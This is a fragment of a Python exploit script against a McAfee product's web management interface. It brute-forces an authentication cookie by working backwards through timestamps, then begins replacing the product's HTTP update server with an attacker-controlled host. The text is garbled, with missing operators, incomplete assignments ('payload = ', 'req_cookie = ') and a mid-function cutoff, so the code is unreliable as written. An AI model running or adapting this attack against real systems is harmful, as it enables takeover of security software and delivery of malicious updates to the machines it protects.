Event()requests.packages.urllib3.disable_warnings()with open("", "r") as f: payload = def pprint(inp, flag=False): pad = "#" if flag: pad = "*" print("\n" pad " " inp) def crack_cookie(): pprint("Cracking Cookie") # A page that requires authentication url = target_domain ":" str(target_port) "/0409/nails?

pg=proxy&tplt=product Update.html" # Start at the current time 100 in case of recent login with clock skew date_val = int(time.time() 100) cookie_fmt = authorized_ip "/n/0/%d-checksum// " authorized_ip " "*20 # Make requests, print after every 600 while True: cookie = cookie_fmt % date_val req_cookie = r = requests.get(url, cookies=req_cookie, verify=False) r.raise_for_status() if "Set-Cookie" in r.headers: valid_cookie = cookie timestamp = cookie.split("/")[3].split("-")[0] break elif date_val % 600 == 0: print("Now trying %s" % time.asctime(time.localtime(date_val))) date_val -= 1 pprint("Cookie Cracked: " timestamp, True) return valid_cookie def update_update_server(auth_cookie): pprint("Updating update server") # Replace Mc Afee Http update server with attacker local_ip:update_server_port url = target_domain ":" str(target_port) "/0409/nails?

